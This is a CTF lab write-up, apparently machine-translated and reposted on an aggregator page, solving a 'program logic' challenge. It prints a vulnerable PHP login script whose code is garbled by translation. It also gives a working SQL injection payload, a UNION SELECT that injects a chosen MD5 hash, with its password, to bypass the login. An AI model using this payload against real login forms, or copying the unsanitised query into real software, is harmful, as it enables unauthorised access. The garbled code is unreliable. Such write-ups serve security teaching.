Experiment Bar-Program logic problem writeup

Source: Internet
Author: User
Tags md5

1. Procedural logic Issues

The topic hint is the program logic question, that must involve the source audit, F12 view the webpage source code:




Not here to hide the source, construct URL access index.txt The following source code:

Welcome to Simplexue

<body>

<?php

if ($_post[user] && $_post[pass]) {

$conn = mysql_connect ("********," * * * * * *, "********");

mysql_select_db ("Phpformysql") or Die ("Could not select Database");

if ($conn->connect_error) {

Die ("connectionfailed:". Mysql_error ($conn));

}

$user = $_post[user];

$pass = MD5 ($_post[pass]);

$sql = "Select pw from php whereuser= ' $user '";

$query = mysql_query ($sql);

if (! $query) {

printf ("error:%s\n", Mysql_error ($conn));

Exit ();

}

$row = Mysql_fetch_array ($query, MYSQL_ASSOC);

echo $row ["PW"];

if ($row [PW]) && (!strcasecmp ($pass, $row [PW])) {

echo "<p>logged in! key:************** </p> ";

}

else {

Echo ("<p>log in Failure!</p>");

}

}

?>

<form Method=post action=index.php>

<input type=text name=uservalue= "Username" >

<input type=password name=passvalue= "Password" >

<input type=submit>

</form>

</body>

<a href= "Index.txt" >

According to the source code can see two places of special importance, I have been marked red, it is obvious that the SQL statement injection vulnerability, but the password bar can not be used to bypass the general injection, but found that as long as the content ($row [PW]) && (!strcasecmp ($pass, $row [PW] can get the flag, that is, we enter the $pass and the data taken from the database to the same line, we can control the value of $pass, but we do not seem to know the value of PW in the database, but we can directly use the union SELECT ' A MD5 encrypted string ' #来自己随意设定密码, note that this must be MD5 encrypted, or it will go wrong.

Construct statement: ' and 0=1 Union select ' 529ca8050a00180790cf88b63468826a ' #

Password: hehe

I got the flag.

2.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.